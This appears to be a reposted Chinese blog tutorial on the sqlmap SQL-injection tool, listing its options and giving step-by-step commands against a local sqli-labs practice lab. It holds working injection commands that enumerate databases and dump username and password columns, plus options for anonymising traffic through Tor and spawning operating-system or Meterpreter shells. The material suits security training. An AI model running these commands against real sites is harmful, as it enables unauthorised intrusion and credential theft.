乘风原创程序

  • sqlmap的使用方法
  • 2020/7/30 12:16:01
  • SQLmap的使用

    参数

    目标:至少要选中一个参数
    -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)
    -g GOOGLEDORK 将谷歌dork的结果作为目标url
    请求:
    这些选项可用于指定如何连接到目标URL
    –data=DATA 数据字符串通过POST发送
    –cookie=COOKIE HTTP Cookie的值
    –random-agent 随机选择 HTTP User-Agent 头的值
    –proxy=PROXY 使用代理去连接目标URL
    –tor 使用匿名网络
    –check-tor 检查Tor是否正确使用
    注入:
    这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本
    -p TESTPARAMETER 可测试的参数
    –dbms=DBMS 将后端DBMS强制到此值
    检测:
    这些选项可用于定制检测阶段
    –level=LEVEL 执行的测试级别(1-5, 默认 1)
    –risk=RISK 执行测试的风险 (1-3, 默认 1)
    技术:
    这些选项可用于调整特定SQL注入的测试的技术
    –technique=TECH SQL注入技术选择 (默认 “BEUSTQ”)
    枚举:
    T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句
    -a, --all 检索全部
    -b, --banner 检索 banner
    –current-user 检索当前用户
    –current-db 检索当前数据库
    –passwords 列出用户密码的hash值
    –tables 列出表
    –columns 列出字段
    –schema 列出DBMS schema
    –dump Dump DBMS数据库表的条目
    –dump-all Dump 所有DBMS数据库表的条目
    -D DB 指定数据库
    -T TBL 指定表
    -C COL 指定字段
    操作系统访问:
    这些选项可用于访问后端数据库管理系统底层操作系统
    –os-shell 提示为交互式操作系统shell
    –os-pwn 提示为OOB外壳,Meterpreter或VNC
    通用:
    这些选项可用于设置一些通用的工作参数
    –batch 永远不要要求用户输入,使用默认行为
    –flush-session 刷新当前目标的会话文件
    杂项:
    –sqlmap-shell 提示输入交互式sqlmap shell
    –wizard 初学者的简单向导界面

    用于MySQL注入

    GET类型
    查找是否有注入点

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --batch

    查找数据库

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --dbs --batch

    查找当前数据库

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --current-db --batch

    查找表

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql --tables --batch

    查找表中的列(字段)

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users --columns --batch

    查找字段中的数据

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users -C"password,username" --dump --batch

    POST类型
    查找是否有注入点

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --batch

    查找数据库

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --dbs --batch

    查找当前数据库

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --current-db --batch

    查找表

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql --tables --batch

    查找表中的列(字段)

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users --columns --batch

    查找字段中的数据

    python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users -C"password,username" --dump --batch

    本文地址:https://blog.csdn.net/qq_41679358/article/details/107619417